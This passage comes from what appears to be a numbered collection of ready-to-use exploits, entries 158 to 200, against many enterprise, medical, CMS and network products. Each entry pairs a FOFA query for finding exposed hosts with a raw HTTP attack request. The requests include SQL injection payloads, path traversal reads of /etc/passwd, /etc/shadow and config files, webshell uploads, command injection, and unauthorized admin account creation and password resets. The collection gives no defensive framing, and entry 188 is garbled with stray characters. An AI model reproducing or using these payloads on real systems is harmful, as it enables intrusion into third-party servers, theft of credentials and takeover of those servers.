User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment 任意文件读取
$ i& U, ^$ t8 D5 w% Lversion <= 3.9.7
1 q! a  f7 T2 [" h" _9 q8 ~# GFOFA:body="/system/get_rtc_user_defined_info?site_id"
8 ~2 _+ K, B# l6 [GET /attachment?file=/etc/passwd HTTP/1.1
& e: c/ K! [5 W+ uHost: your-ip+ W* ^- |4 r2 y! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: r/ j$ q9 h% D" Y% j  J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- ]: k6 t; y; [Accept-Encoding: gzip, deflate( e8 @& x. c7 n9 o' k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* _1 m- K2 m  Q: z' h+ VConnection: close
3 P& o( Q% [+ F) Y2 ]' C3 p7 Z5 ]. ^/ D
9 ]8 k$ W, U* l, X: G, x
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager/upload interface file upload
FOFA:title="Authenticate Please!"

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returning csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returning:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie, then access the uploaded path:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
